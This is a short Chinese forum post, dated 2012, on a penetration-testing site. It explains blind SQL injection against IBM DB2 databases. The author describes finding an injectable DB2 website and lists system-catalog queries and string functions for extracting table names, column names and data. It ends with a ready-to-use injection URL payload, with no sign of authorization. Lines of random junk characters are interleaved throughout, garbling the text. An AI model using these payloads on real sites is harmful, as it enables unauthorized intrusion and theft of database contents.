中国网络渗透测试联盟
标题:
Sql Injection in DB2数据库
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
Sql Injection in DB2数据库
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
2 H/ M6 t; ^3 J" E4 N! c, F
参考了IBM DB2的文档,总结了这样几条:
; q9 E- h- O! W/ w8 [
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
1 t, V) V2 q. a7 o) l" A
可以返回系统中所有用户创建的表(table)名
$ o+ s$ J$ L+ o: K# @9 }, ]
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
- w) e/ o, M% U; ]
返回表中的列名
5 d- D+ r$ t' l( S# r; @
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
: [& G% E; ^$ E/ M1 Z
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
7 {: p& z( j' L; F; _5 [, [
4、SUBSTR(string, position, length)
; y$ F1 P+ P+ j0 q* d
返回字符串子串的函数,类似于mid
+ ?9 q) m: \. M
5、ASCII()这个就不用多说了。
# h0 @$ z; Q/ f ?$ q
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
% x+ J7 c2 K6 _- ?
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
9 N0 |, `& u2 i1 ~! c7 Q% Z
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
- c& `5 C+ r1 |) V/ J
1 @$ r! P {: H3 M' b& V
http://blog.waynedeng.com/blogview.asp?logID=543
4 z. \7 ]+ x2 i* N
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2